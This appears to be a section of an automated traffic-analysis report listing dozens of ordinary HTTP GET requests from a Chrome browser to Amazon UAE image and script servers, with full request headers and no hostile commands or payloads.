    Source: global trafficHTTP traffic detected: GET /ih/1722546148000/inner-host.min.js HTTP/1.1Host: d1lxz4vuik53pc.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/611NR29KK3L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81mSTCJf8rL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71XtvleNvPL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71J-qkoOa1L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71-6gmcJ+TL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61LEH6WEXkL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71gFU9n0ZtL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81HkPn35qKL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31OyASKbVLL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71Q5hfLlYnL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71DNx9jePML._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51uDcEGE7-L.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/ZpbG74laklgnz-i.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71F6CWfC-yL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81D1JwUbdEL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51m-fKwiHIL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71AigHiXprL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/818P7sdeAGL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81cggBqOhgL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61SOdIEAB3L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71YanNbDe3L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61MltGgbc4L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71U06Q9P9YL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
